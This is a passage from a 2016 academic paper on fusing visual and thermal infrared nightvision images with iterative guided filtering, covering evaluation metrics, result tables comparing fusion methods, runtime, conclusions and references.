(G), DWT (H), SIDWT (I), and the proposed method (J), for scene nr. 10. Test imagery Figure 2 shows the intensified visual (II), thermal infrared (IR) or near infrared (NIR: scene 12) source images together with the result of the proposed fusion scheme (F) for each of the 12 scenes used in this study. The 12 scenes are part of the TNO Image Fusion Dataset (Toet, 2014) with the following identifiers: airplane_in_trees, Barbed_wire_2, Jeep, Kaptein_1123, Marne_07, Marne_11, Marne_15, Reek, tank, Nato_camp_sequence, soldier_behind_smoke, Vlasakkers. Multi-scale fusion schemes used for comparison In this study we compare the performance of our image fusion scheme with seven other popular image fusion methods based on multi-scale decomposition including the Laplacian pyramid (Burt & Adelson, 1983), the Ratio of Low-Pass pyramid (Toet, 1989b), the contrast pyramid (Toet, Van Ruyven & Valeton, 1989), the filter-subtract-decimate Laplacian pyramid (Burt, 1988; Burt & Kolczynski, 1993), the gradient pyramid (Burt, 1992; Burt & Kolczynski, 1993), the morphological pyramid (Toet, 1989a), the discrete wavelet transform (Lemeshewsky, 1999; Li, Manjunath & Mitra, 1995; Li, Kwok & Wang, 2002; Scheunders & De Backer, 2001), and a shift invariant extension of the discrete wavelet transform (Lemeshewsky, 1999; Rockinger, 1997; Rockinger, 1999; Rockinger & Fechner, 1998). We used Rockinger’s freely available Matlab image fusion toolbox (www.metapix.de/toolbox.htm) to compute these fusion schemes. To allow a straightforward comparison, the number of scale levels is set to 4 in all methods, and simple averaging is used to compute the approximation of the fused image representation at the coarsest spatial scale. Figures 5–9 show the results of the proposed method together with the results of other seven fusion schemes for some of the scenes used in this study (scenes 2–5 and 10). Objective evaluation metrics Image fusion results can be evaluated using either subjective or objective measures. Subjective methods are based on psycho-visual testing and are typically expensive in terms Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.80 13/26 https://peerj.com http://www.metapix.de/toolbox.htm http://dx.doi.org/10.7717/peerj-cs.80 Figure 6 As Fig. 5, for scene nr. 2. Figure 7 As Fig. 5, for scene nr. 3. Figure 8 As Fig. 5, for scene nr. 4. Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.80 14/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.80 Figure 9 As Fig. 5, for scene nr. 5. of time, effort, and equipment required. Also, in most cases, there is only little difference among fusion results. This makes it difficult to subjectively perform the evaluation of fusion results. Therefore, many objective evaluation methods have been developed (for an overview see e.g., Li, Li & Gong, 2010; Liu et al., 2012). However, so far, there is no universally accepted metric to objectively evaluate the image fusion results. In this paper, we use four frequently applied computational metrics to objectively evaluate and compare the performance of different image fusion methods. The metrics we use are Entropy, the Mean Structural Similarity Index (MSSIM), Normalized Mutual Information (NMI), and Normalized Feature Mutual Information (NFMI). These metrics will be briefly discussed in the following sections. Entropy Entropy (E) is a measure of the information content in a fused image F. Entropy is defined as EF =− L−1∑ i=0 PF(i)logPF(i) (19) where PF(i) indicates the probability that a pixel in the fused image F has a gray value i, and the gray values range from 0 to L. The larger the entropy is, the more informative the fused image is. A fused image is more informative than either of its source images when its entropy is higher than the entropy of its source images. Mean Structural Similarity Index The Structural Similarity (SSIM: Wang et al., 2004) index is a stabilized version of the Universal Image Quality Index (UIQ: Wang & Bovik, 2002) which can be used to quantify the structural similarity between a source image A and a fused image F: SSIMx,y = 2µxµy+C1 µ2x+µ 2 y+C1 · 2σxσy+C2 σ2x +σ 2 y +C2 · σxy+C3 σxσy+C3 (20) Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.80 15/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.80 where x and y represent local windows of size M×N in respectively A and F, and µx = 1 M×N M∑ i=1 N∑ j=1 x(i,j), µy = 1 M×N M∑ i=1 N∑ j=1 y(i,j) (21) σ 2 x = 1 M×N M∑ i=1 N∑ j=1 (x(i,j)−µx) 2 , σ 2 y = 1 M×N M∑ i=1 N∑ j=1 (y(i,j)−µy) 2 (22) σ 2 xy = 1 M×N M∑ i=1 N∑ j=1 (x(i,j)−µx)(y(i,j)−µy). (23) By default, the stabilizing constants are set to C1=(0.01·L)2, C2=(0.03·L)2 and C3=C2/2, where L is the maximal gray value. The value of SSIM is bounded and ranges between −1 and 1 (it is 1 only when both images are identical). The SSIM is typically computed over a sliding window to compare local patterns of pixel intensities that have been normalized for luminance and contrast. The Mean Structural Similarity (MSSIM) index quantifies the overall similarity between a source image A and a fused image F: MSSIMA,F = 1 Nw Nw∑ i=1 SSIMxi,yi (24) where Nw represents the number of local windows of the image. An overall image fusion quality index can then be defined as the mean MSSIM values between each of the source images and the fused result: MSSIMA,BF = MSSIMA,F +MSSIMB,F 2 (25) MSSIMA,BF ranges between −1 and 1 (it is 1 only when both images are identical). Normalized Mutual Information Mutual Information (MI) measures the amount of information that two images have in common. It can be used to quantify the amount of information from a source image that is transferred to a fused image (Qu, Zhang & Yan, 2002). The mutual information MIAF between a source image A and a fused image F is defined as: MIA,F = ∑ i,j PA,F(i,j)log PA,F(i,j) PA(i)PF(j) (26) where PA(i) and PF(j) are the probability density functions in the individual images, and PAF(i,j) is the joint probability density function. The traditional mutual information metric is unstable and may bias the measure towards the source image with the highest entropy. This problem can be resolved by computing the normalized mutual information (NMI) as follows (Hossny, Nahavandi & Creighton, 2008): NMIA,BF = MIA,F HA+HF + MIB,F HB+HF (27) Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.80 16/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.80 where HA,HB and HF are the marginal entropy of A, B and F, and MIA,F and MIB,F represent the mutual information between respectively the source image A and the fused image F and between the source image B and the fused image F. A higher value of NMI indicates that more information from the source images is transferred to the fused image. The NMI metric varies between 0 and 1. Normalized Feature Mutual Information The Feature Mutual Information (FMI) metric calculates the amount of image features that two images have in common (Haghighat & Razian, 2014; Haghighat, Aghagolzadeh & Seyedarabi, 2011). This method outperforms other metrics (e.g., E, NMI) in consistency with the subjective quality measures. Previously proposed MI-based image fusion quality metrics use the image histograms to compute the amount of information a source and fused image have in common (Cvejic, Canagarajah & Bull, 2006; Qu, Zhang & Yan, 2002). However, image histograms contain no information about local image structure (spatial features or local image quality) and only provide statistical measures of the number of pixels in a specific gray-level. However, since meaningful image information is contained in visual features, image fusion quality measures should measure the extent to which these visual features are transferred into the fused image from each of the source images. The Feature Mutual Information (FMI) metric calculates the mutual information between image feature maps (Haghighat & Razian, 2014; Haghighat, Aghagolzadeh & Seyedarabi, 2011). A typical image feature map is for instance the gradient map, which contains information about the pixel neighborhoods, edge strength and directions, texture and contrast. Given two source images as A and B and their fused image as F, the FMI metric first extracts feature maps of the source and fused images using a feature extraction method (e.g., gradient). After feature extraction, the feature images A′, B′ and F ′ are normalized to create their marginal probability density functions PA′, PB′ and PF′. The joint probability density functions PA′,F′ and PB′,F′ are then estimated from the marginal distributions using Nelsen’s method (Nelsen, 1987). The algorithm is described in more detail elsewhere (Haghighat, Aghagolzadeh & Seyedarabi, 2011). The FMI metric between a source image A and a fused image F is then given by FMIA,F =MIA′,F′ = ∑ i,j PA′,F′(i,j)log PA′,F′(i,j) PA′(i)PF′(j) (28) and the normalized feature mutual information (FMI) can be computed as follows FMIA,BF = MIA′,F′ HA′+HF′ + MIB′,F′ HB′+HF′ . (29) In practice the FMI is computed locally over small corresponding windows between the source and the fused images and averaged over all windows covering the image plane (Haghighat & Razian, 2014). Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.80 17/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.80 Table 1 Entropy values for each of the methods tested and for all 12 scenes. Scene nr. Contrast DWT Gradient Laplace Morph Ratio SIDWT IGF 1 6.4818 6.4617 6.1931 6.5935 6.6943 6.5233 6.4406 6.5126 2 6.7744 6.6731 6.5873 6.7268 6.9835 6.7268 6.7075 7.4233 3 6.4340 6.5704 6.4965 6.6401 6.7032 6.6946 6.5878 6.8589 4 6.8367 6.8284 6.6756 7.0041 7.0906 6.7313 6.8547 7.2491 5 6.7549 6.6642 6.5582 6.7624 6.8618 6.5129 6.6813 7.1177 6 6.3753 6.3705 6.2430 6.5049 6.7608 6.2281 6.4116 6.9044 7 6.7470 6.3709 6.1890 6.5106 6.7445 6.3458 6.3817 6.7869 8 6.3229 7.3503 7.2935 7.3794 7.3501 7.4873 7.3406 7.4891 9 6.4903 6.4677 6.3513 6.5816 6.7295 6.3306 6.4753 6.7796 10 6.9627 7.0131 6.8390 7.1073 7.0530 7.0118 7.0224 7.2782 11 6.5442 6.4554 6.2110 6.5555 6.8051 6.4053 6.4572 6.2907 12 7.3335 7.3744 7.3379 7.3907 7.4251 7.3486 7.3746 7.3568 RESULTS Fusion evaluation Here we assess the performance of the proposed image fusion scheme on the intensified visual and thermal infrared images for each of the 12 selected scenes, using Entropy, the Mean Structural Similarity Index (MSSIM), Normalized Mutual Information (NMI), and Normalized Feature Mutual Information (NFMI) as the objective performance measures. We also compare the results of the proposed method with those of seven other popular multi-scale fusion schemes. Table 1 lists the entropy of the fused result for the proposed method (IGF) and all seven multi-scale comparison methods (Contrast Pyramid, DWT, Gradient Pyramid, Laplace Pyramid, Morphological Pyramid, Ratio Pyramid, SIDWT). It appears that IGF produces a fused image with the highest entropy for 9 of the 12 test scenes. Note that a larger entropy implies more edge information, but it does not mean that the additional edges are indeed meaningful (they may result from over enhancement or noise). Therefore, we also need to consider structural information metrics. Table 2 shows that IGF outperforms all other multi-scale methods tested here in terms of MSSIM. This means that the mean overall structural similarity between both source images the fused image F is largest for the proposed method. Table 3 shows that IGF also outperforms all other multi-scale methods tested here in terms of NMI. This indicates that the proposed IGF fusion scheme transfers more information from the source images to the fused image than any of the other methods. Table 4 shows that IGF also outperforms 10 of the 12 other multi-scale methods tested here in terms of NFMI. IGF is only outperformed by SIDWT for scene 1 and by the Contrast Pyramid for scene 7. This implies that fused images produced by the proposed IGF scheme typically have a larger amount of image features in common with their source images than the results of most other fusion schemes. Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.80 18/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.80 Table 2 MSSIM values for each of the methods tested and for all 12 scenes. Scene nr. Contrast DWT Gradient Laplace Morph Ratio SIDWT IGF 1 0.7851 0.7975 0.8326 0.8050 0.7321 0.8054 0.8114 0.8381 2 0.6018 0.6798 0.7130 0.6406 0.6203 0.6406 0.6935 0.7213 3 0.7206 0.7493 0.7849 0.7555 0.6882 0.7468 0.7629 0.7932 4 0.6401 0.6790 0.7162 0.6875 0.6155 0.6668 0.6949 0.7184 5 0.5856 0.6649 0.6938 0.6695 0.6250 0.6270 0.6769 0.7038 6 0.5689 0.6448 0.6755 0.6516 0.5961 0.6099 0.6598 0.6921 7 0.3939 0.5742 0.5994 0.5809 0.5320 0.4490 0.5889 0.6344 8 0.6474 0.6272 0.6630 0.6392 0.5791 0.6291 0.6463 0.6940 9 0.6224 0.6883 0.7224 0.6955 0.6445 0.6718 0.7089 0.7405 10 0.3913 0.5410 0.5715 0.5430 0.4899 0.4331 0.5513 0.5961 11 0.7174 0.7307 0.7754 0.7439 0.6559 0.7419 0.7539 0.7908 12 0.7945 0.8116 0.8466 0.8227 0.7815 0.8106 0.8365 0.8646 Table 3 NMI values for each of the methods tested and for all 12 scenes. Scene nr. Contrast DWT Gradient Laplace Morph Ratio SIDWT IGF 1 0.1534 0.1692 0.2052 0.1647 0.1699 0.1791 0.1796 0.2818 2 0.0989 0.0948 0.1158 0.0897 0.1028 0.0897 0.1028 0.2994 3 0.0898 0.1222 0.1493 0.1252 0.1171 0.1320 0.1280 0.2231 4 0.1102 0.1097 0.1322 0.1189 0.1169 0.1046 0.1177 0.2294 5 0.1236 0.1170 0.1379 0.1252 0.1318 0.1186 0.1251 0.2166 6 0.0857 0.0943 0.1162 0.0969 0.1068 0.0902 0.0980 0.2229 7 0.0697 0.0711 0.0839 0.0809 0.0888 0.0616 0.0781 0.2147 8 0.2192 0.1825 0.2198 0.1832 0.1884 0.2130 0.2021 0.3090 9 0.0692 0.0679 0.0781 0.0747 0.0790 0.0690 0.0731 0.2013 10 0.1375 0.1643 0.2043 0.1780 0.1761 0.1662 0.1760 0.2962 11 0.1055 0.1043 0.1177 0.1100 0.1047 0.1179 0.1115 0.1646 12 0.2572 0.2511 0.2746 0.2602 0.2438 0.2660 0.2649 0.2987 Summarizing, the proposed IGF fusion scheme appears to outperform the other multi-scale fusion methods investigated here in most of the conditions tested. Runtime In this study we used a Matlab implementation of the GF and IGF written by Zhang et al. (2014) that is freely available from the authors (at http://www.cs.cuhk.edu.hk/~leojia/ projects/rollguidance). We made no effort to optimize the code of the algorithms. We conducted a runtime test on a Dell Latitude laptop with an Intel i5 2 GHz CPU and 8 GB memory. The algorithms were implemented in Matlab 2016a. Only a single thread was used without involving any SIMD instructions. For this test we used the set of 12 test images described in ‘Test imagery.’ As noted before, the filter size and regularization parameters used in this study are respectively set to ri ={5,10,30} and εi ={0.0001,0.01,0.1} for Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.80 19/26 https://peerj.com http://www.cs.cuhk.edu.hk/~leojia/projects/rollguidance http://www.cs.cuhk.edu.hk/~leojia/projects/rollguidance http://dx.doi.org/10.7717/peerj-cs.80 Table 4 NFMI values for each of the methods tested and for all 12 scenes. Scene nr. Contrast DWT Gradient Laplace Morph Ratio SIDWT IGF 1 0.4064 0.3812 0.3933 0.3888 0.3252 0.3498 0.4084 0.4008 2 0.4354 0.3876 0.4001 0.3493 0.3432 0.3493 0.4075 0.4383 3 0.4076 0.4081 0.4175 0.4138 0.3758 0.3552 0.4330 0.4454 4 0.4017 0.3913 0.4066 0.4051 0.3655 0.3497 0.4205 0.4490 5 0.4304 0.3971 0.4101 0.4081 0.3758 0.3497 0.4229 0.4580 6 0.4299 0.4074 0.4203 0.4164 0.3832 0.3570 0.4295 0.4609 7 0.5050 0.4383 0.4439 0.4357 0.3942 0.3779 0.4469 0.4286 8 0.4305 0.4074 0.4097 0.4113 0.3806 0.3553 0.4273 0.4325 9 0.4351 0.3959 0.4105 0.3995 0.3658 0.3539 0.4130 0.4370 10 0.4439 0.4251 0.4263 0.4268 0.3863 0.3465 0.4513 0.5045 11 0.3882 0.3798 0.3987 0.3804 0.3131 0.3453 0.4068 0.4206 12 0.4051 0.3725 0.3973 0.3820 0.3449 0.3635 0.4111 0.4257 spatial scale levels i={0,1,2}. The mean runtime of the proposed fusion method was 0.61 ± 0.05 s. DISCUSSION AND CONCLUSIONS We propose a multi-scale image fusion scheme based on guided filtering. Iterative guided filtering is used to decompose the source images into approximation and residual layers. Initial binary weighting maps are computed as the pixelwise maximum of the individual source saliency maps, obtained from frequency tuned filtering. Spatially consistent and smooth weighting maps are then obtained through guided filtering of the binary weighting maps with their corresponding source layers as guidance images. Saliency weighted recombination of the individual source residual layers and the mean of the coarsest scale source layers finally yields the fused image. The proposed multi-scale image fusion scheme achieves spatial consistency by using guided filtering both at the decomposition and at the recombination stage of the multi-scale fusion process. Application to multiband visual (intensified) and thermal infrared imagery demonstrates that the proposed method obtains state-of-the-art performance for the fusion of multispectral nightvision images. The method has a simple implementation and is computationally efficient. ADDITIONAL INFORMATION AND DECLARATIONS Funding The effort was sponsored by the Air Force Office of Scientific Research, Air Force Material Command, USAF, under grant number FA9550-15-1-0433. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.80 20/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.80 Grant Disclosures The following grant information was disclosed by the author: Air Force Office of Scientific Research, Air Force Material Command, USAF: FA9550-15- 1-0433. Competing Interests The author declares there are no competing interests. Author Contributions • Alexander Toet conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: Figshare: TNO Image Fusion Dataset http://dx.doi.org/10.6084/m9.figshare.1008029. REFERENCES Achanta R, Hemami S, Estrada F, Süsstrunk S. 2009. Frequency-tuned salient region de- tection. In: Hemami S, Estrada F, Susstrunk S, eds. IEEE international conference on computer vision and pattern recognition (CVPR2009). Piscataway: IEEE, 1597–1604. Agarwal J, Bedi SS. 2015. Implementation of hybrid image fusion technique for feature enhancement in medical diagnosis. Human-centric Computing and Information Sciences 5(1):1–17 DOI 10.1186/s13673-014-0018-6. Bavirisetti DP, Dhuli R. 2016a. Fusion of infrared and visible sensor images based on anisotropic diffusion and Karhunen–Loeve transform. IEEE Sensors Journal 16(1):203–209 DOI 10.1109/JSEN.2015.2478655. Bavirisetti DP, Dhuli R. 2016b. Two-scale image fusion of visible and infrared images using saliency detection. Infrared Physics and Technology 76:52–64 DOI 10.1016/j.infrared.2016.01.009. Beyan C, Yigit A, Temizel A. 2011. Fusion of thermal- and visible-band video for abandoned object detection. Journal of Electronic Imaging 20(033001):1–12 DOI 10.1117/1.3602204. Bhatnagar G, Wu QMJ. 2011. Human visual system based framework for concealed weapon detection. In: The 2011 Canadian conference on computer and robot vision (CRV). Piscataway: IEEE, 250–256. Biswas B, Chakrabarti A, Dey KN. 2015. Spine medical image fusion using wiener filter in shearlet domain. In: IEEE 2nd international conference on recent trends in information systems (ReTIS 2015). Piscataway: IEEE, 387–392. Black MJ, Sapiro G, Marimont DH, Heeger D. 1998. Robust anisotropic diffusion. IEEE Transactions on Image Processing 7(3):421–432 DOI 10.1109/83.661192. Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.80 21/26 https://peerj.com http://dx.doi.org/10.6084/m9.figshare.1008029 http://dx.doi.org/10.1186/s13673-014-0018-6 http://dx.doi.org/10.1109/JSEN.2015.2478655 http://dx.doi.org/10.1016/j.infrared.2016.01.009 http://dx.doi.org/10.1117/1.3602204 http://dx.doi.org/10.1109/83.661192 http://dx.doi.org/10.7717/peerj-cs.80 Blum RS, Liu Z. 2006. Multi-sensor image fusion and its applications. Boca Raton: CRC Press, Taylor & Francis Group. Bulanona DM, Burks TF, Alchanatis V. 2009. Image fusion of visible and thermal images for fruit detection. Biosystems Engineering 103(1):12–22 DOI 10.1016/j.biosystemseng.2009.02.009. Burt PJ. 1988. Smart sensing with a pyramid vision machine. Proceedings IEEE 76(8):1006–1015 DOI 10.1109/5.5971. Burt PJ. 1992. A gradient pyramid basis for pattern-selective image fusion. In: SID international symposium 1992. Playa del Rey: Society for Information Display, 467–470. Burt PJ, Adelson EH. 1983. The Laplacian pyramid as a compact image code. IEEE Transactions on Communications 31(4):532–540 DOI 10.1109/TCOM.1983.1095851. Burt PJ, Kolczynski RJ. 1993. Enhanced image capture through fusion. In: Fourth international conference on computer vision. Piscataway: IEEE Computer Society Press, 173–182. Cui G, Feng H, Xu Z, Li Q, Chen Y. 2015. Detail preserved fusion of visible and infrared images using regional saliency extraction and multi-scale image decomposition. Optics Communications 341:199–209 DOI 10.1016/j.optcom.2014.12.032. Cvejic N, Canagarajah CN, Bull DR. 2006. Image fusion metric based on mu- tual information and Tsallis entropy. Electronics Letters 42(11):626–627 DOI 10.1049/el:20060693. Daneshvar S, Ghassemian H. 2010. MRI and PET image fusion by combining IHS and retina-inspired models. Information Fusion 11(2):114–123 DOI 10.1016/j.inffus.2009.05.003. Farbman Z, Fattal R, Lischinski D, Szeliski R. 2008. Edge-preserving decompositions for multi-scale tone and detail manipulation. ACM Transactions on Graphics 27(3 - Article No. 67):1–10 DOI 10.1145/1360612.1360666. Fecteau JH, Munoz DP. 2006. Salience, relevance, and firing: a priority map for target selection. Trends in Cognitive Sciences 10(8):382–390 DOI 10.1016/j.tics.2006.06.011. Gan W, Wu X, Wu W, Yang X, Ren C, He X, Liu K. 2015. Infrared and visible image fusion with the use of multi-scale edge-preserving decomposition and guided image filter. Infrared Physics & Technology 72:37–51 DOI 10.1016/j.infrared.2015.07.003. Ghassemian H. 2001. A retina based multi-resolution image-fusion. In: IEEE interna- tional geoscience and remote sensing symposium (IGRSS2001). Piscataway: IEEE, 709–711. Haghighat MBA, Aghagolzadeh A, Seyedarabi H. 2011. A non-reference image fusion metric based on mutual information of image features. Computers & Electrical Engineering 37(5):744–756 DOI 10.1016/j.compeleceng.2011.07.012. Haghighat M, Razian MA. 2014. Fast-FMI: non-reference image fusion metric. Piscataway: IEEE, 1–3. He K, Sun J, Tang X. 2013. Guided image filtering. IEEE Transactions on Pattern Analysis and Machine Intelligence 35(6):1397–1409 DOI 10.1109/TPAMI.2012.213. Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.80 22/26 https://peerj.com http://dx.doi.org/10.1016/j.biosystemseng.2009.02.009 http://dx.doi.org/10.1109/5.5971 http://dx.doi.org/10.1109/TCOM.1983.1095851 http://dx.doi.org/10.1016/j.optcom.2014.12.032 http://dx.doi.org/10.1049/el:20060693 http://dx.doi.org/10.1016/j.inffus.2009.05.003 http://dx.doi.org/10.1145/1360612.1360666 http://dx.doi.org/10.1016/j.tics.2006.06.011 http://dx.doi.org/10.1016/j.infrared.2015.07.003 http://dx.doi.org/10.1016/j.compeleceng.2011.07.012 http://dx.doi.org/10.1109/TPAMI.2012.213 http://dx.doi.org/10.7717/peerj-cs.80 Hossny M, Nahavandi S, Creighton D. 2008. Comments on ‘‘Information mea- sure for performance of image fusion’’. Electronics Letters 44(18):1066–1067 DOI 10.1049/el:20081754. Jacobson NP, Gupta MR. 2005. Design goals and solutions for display of hyperspectral images. IEEE Transactions on Geoscience and Remote Sensing 43(11):2684–2692 DOI 10.1109/TGRS.2005.857623. Jacobson NP, Gupta MR, Cole JB. 2007. Linear fusion of image sets for display. IEEE Transactions on Geoscience and Remote Sensing 45(10):3277–3288 DOI 10.1109/TGRS.2007.903598. Jiang D, Zhuang D, Huan Y, Fu J. 2011. Survey of multispectral image fusion techniques in remote sensing applications. In: Zheng Y, ed. Image fusion and its applications. Rijeka, Croatia: InTech Open, 1–22. Kong SG, Heo J, Boughorbel F, Zheng Y, Abidi BR, Koschan A, Yi M, Abidi MA. 2007. Multiscale fusion of visible and thermal IR images for illumination- invariant face recognition. International Journal of Computer Vision 71(2):215–233 DOI 10.1007/s11263-006-6655-0. Kong W, Wang B, Lei Y. 2015. Technique for infrared and visible image fusion based on non-subsampled shearlet transform & spiking cortical model. Infrared Physics & Technology 71:87–98 DOI 10.1016/j.infrared.2015.02.008. Kumar BKS. 2013. Image fusion based on pixel significance using cross bilateral filter. Signal, Image and Video Processing 9(5):1193–1204 DOI 10.1007/s11760-013-0556-9. Lemeshewsky GP. 1999. Park SJ, Juday RD, eds. Multispectral multisensor image fusion using wavelet transforms. Bellingham: The International Society for Optical Engineering, 214–222. Lepley JJ, Averill MT. 2011. Detection of buried mines and explosive objects using dual- band thermal imagery. In: Harmon RS, Holloway JH, Broach JT, eds. Detection and sensing of mines, explosive objects, and obscured targets XVI, Vol. SPIE-8017. Bellingham: The International Society for Optical Engineering, 80171V80171-80112. Li S, Kang X, Hu J. 2013. Image fusion with guided filtering. IEEE Transactions on Image Processing 22(7):2864–2875 DOI 10.1109/TIP.2013.2244222. Li S, Kwok JT, Wang Y. 2002. Using the discrete wavelet frame transform to merge Landsat TM and SPOT panchromatic images. Information Fusion 3(1):17–23 DOI 10.1016/S1566-2535(01)00037-9. Li S, Li Z, Gong J. 2010. Multivariate statistical analysis of measures for assessing the quality of image fusion. International Journal of Image and Data Fusion 1(1):47–66 DOI 10.1080/19479830903562009. Li H, Manjunath BS, Mitra SK. 1995. Multisensor image fusion using the wavelet transform. Computer Vision, Graphics and Image Processing: Graphical Models and Image Processing 57(3):235–245. Liu Z, Blasch EP, Xue Z, Zhao J, Laganière R, Wu W. 2012. Objective assessment of multiresolution image fusion algorithms for context enhancement in night vision: a comparative study. IEEE Transactions on Pattern Analysis and Machine Intelligence 34(1):94–109 DOI 10.1109/TPAMI.2011.109. Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.80 23/26 https://peerj.com http://dx.doi.org/10.1049/el:20081754 http://dx.doi.org/10.1109/TGRS.2005.857623 http://dx.doi.org/10.1109/TGRS.2007.903598 http://dx.doi.org/10.1007/s11263-006-6655-0 http://dx.doi.org/10.1016/j.infrared.2015.02.008 http://dx.doi.org/10.1007/s11760-013-0556-9 http://dx.doi.org/10.1109/TIP.2013.2244222 http://dx.doi.org/10.1016/S1566-2535(01)00037-9 http://dx.doi.org/10.1080/19479830903562009 http://dx.doi.org/10.1109/TPAMI.2011.109 http://dx.doi.org/10.7717/peerj-cs.80 Liu X, Mei W, Du H, Bei J. 2016. A novel image fusion algorithm based on nonsubsam- pled shearlet transform and morphological component analysis. Signal, Image and Video Processing 10(5):959–966 DOI 10.1007/s11760-015-0846-5. Liu Z, Xue Z, Blum RS, Laganiëre R. 2006. Concealed weapon detection and visu- alization in a synthesized image. Pattern Analysis & Applications 8(4):375–389 DOI 10.1007/s10044-005-0020-8. Motamed C, Lherbier R, Hamad D. 2005. A multi-sensor validation approach for human activity monitoring. In: 7th international conference on information fusion (Information Fusion 2005). Piscataway: IEEE. Nelsen RB. 1987. Discrete bivariate distributions with given marginals and correla- tion. Communications in Statistics—Simulation and Computation 16(1):199–208 DOI 10.1080/03610918708812585. O’Brien MA, Irvine JM. 2004. Information fusion for feature extraction and the develop- ment of geospatial information. In: 7th international conference on information fusion. ISIF, 976–982. Perona P, Malik J. 1990. Scale-space and edge detection using anisotropic diffusion. IEEE Transactions on Pattern Analysis and Machine Intelligence 12(7):629–639 DOI 10.1109/34.56205. Petrovic VS, Xydeas CS. 2003. Sensor noise effects on signal-level image fusion perfor- mance. Information Fusion 4(3):167–183 DOI 10.1016/S1566-2535(03)00035-6. Petschnigg G, Agrawala M, Hoppe H, Szeliski R, Cohen M, Toyama K. 2004. Digital photography with flash and no-flash image pairs. New York: ACM Press, 664–672. Qu GH, Zhang DL, Yan PF. 2002. Information measure for performance of image fusion. Electronics Letters 38(7):313–315 DOI 10.1049/el:20020212. Rockinger O. 1997. Image sequence fusion using a shift-invariant wavelet transform. In: IEEE international conference on image processing, Vol. III. Piscataway: IEEE, 288–291. Rockinger O. 1999. Multiresolution-Verfahren zur Fusion dynamischer Bildfolge. PhD Thesis, Technische Universität Berlin. Rockinger O, Fechner T. 1998. Pixel-level image fusion: the case of image sequences. In: Kadar I, ed. Signal processing, sensor fusion, and target recognition VII, vol. SPIE- 3374. Bellingham: The International Society for Optical Engineering, 378–388. Scheunders P, De Backer S. 2001. Fusion and merging of multispectral images us- ing multiscale fundamental forms. Journal of the Optical Society of America A 18(10):2468–2477 DOI 10.1364/JOSAA.18.002468. Shah P, Reddy BCS, Merchant S, Desai U. 2013. Context enhancement to reveal a camouflaged target and to assist target localization by fusion of multispec- tral surveillance videos. Signal, Image and Video Processing 7(3):537–552 DOI 10.1007/s11760-011-0257-1. Singh R, Khare A. 2014. Fusion of multimodal medical images using Daubechies complex wavelet transform—a multiresolution approach. Information Fusion 19:49–60 DOI 10.1016/j.inffus.2012.09.005. Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.80 24/26 https://peerj.com http://dx.doi.org/10.1007/s11760-015-0846-5 http://dx.doi.org/10.1007/s10044-005-0020-8 http://dx.doi.org/10.1080/03610918708812585 http://dx.doi.org/10.1109/34.56205 http://dx.doi.org/10.1016/S1566-2535(03)00035-6 http://dx.doi.org/10.1049/el:20020212 http://dx.doi.org/10.1364/JOSAA.18.002468 http://dx.doi.org/10.1007/s11760-011-0257-1 http://dx.doi.org/10.1016/j.inffus.2012.09.005 http://dx.doi.org/10.7717/peerj-cs.80 Singh R, Vatsa M, Noore A. 2008. Integrated multilevel image fusion and match score fusion of visible and infrared face images for robust face recognition. Pattern Recognition 41(3):880–893 DOI 10.1016/j.patcog.2007.06.022. Tao C, Junping Z, Ye Z. 2005. Remote sensing image fusion based on ridgelet transform. In: 2005 IEEE international geoscience and remote sensing symposium (IGARSS’05), Vol. 2. Piscataway: IEEE, 1150–1153. Tian YP, Zhou KY, Feng X, Yu SL, Liang H, Liang B. 2009. Image fusion for infrared thermography and inspection of pressure vessel. Journal of Pressure Vessel Technology 131(2 - article no. 021502):1–5 DOI 10.1115/1.3066801. Toet A. 1989a. A morphological pyramidal image decomposition. Pattern Recognition Letters 9(4):255–261 DOI 10.1016/0167-8655(89)90004-4. Toet A. 1989b. Image fusion by a ratio of low-pass pyramid. Pattern Recognition Letters 9(4):245–253 DOI 10.1016/0167-8655(89)90003-2. Toet A. 2003. Color image fusion for concealed weapon detection. In: Carapezza EM, ed. Sensors, and command, control, communications, and intelligence (C3I) technologies for homeland defense and law enforcement II, Vol. SPIE-5071. Bellingham: SPIE, 372–379. Toet A. 2011. Computational versus psychophysical image saliency: a comparative evaluation study. IEEE Transactions on Pattern Analysis and Machine Intelligence 33(11):2131–2146 DOI 10.1109/TPAMI.2011.53. Toet A. 2014. TNO Image fusion dataset. Figshare DOI 10.6084/m9.figshare.1008029. Toet A, IJspeert I, Waxman AM, Aguilar M. 1997. Fusion of visible and thermal imagery improves situational awareness. Displays 18(2):85–95 DOI 10.1016/S0141-9382(97)00014-0. Toet A, Van Ruyven LJ, Valeton JM. 1989. Merging thermal and visual images by a contrast pyramid. Optical Engineering 28(7):789–792 DOI 10.1117/12.7977034. Tomasi C, Manduchi R. 1998. Bilateral filtering for gray and color images. In: IEEE sixth international conference on computer vision. Piscataway: IEEE, 839–846. Wang Z, Bovik AC. 2002. A universal image quality index. IEEE Signal Processing Letters 9(3):81–84 DOI 10.1109/97.995823. Wang Z, Bovik AC, Sheikh HR, Simoncelli EP. 2004. Image quality assessment: from error visibility to structural similarity. IEEE Transactions on Image Processing 13(4):600–612 DOI 10.1109/TIP.2003.819861. Wang L, Li B, Tian LF. 2014. Multi-modal medical image fusion using the inter-scale and intra-scale dependencies between image shift-invariant 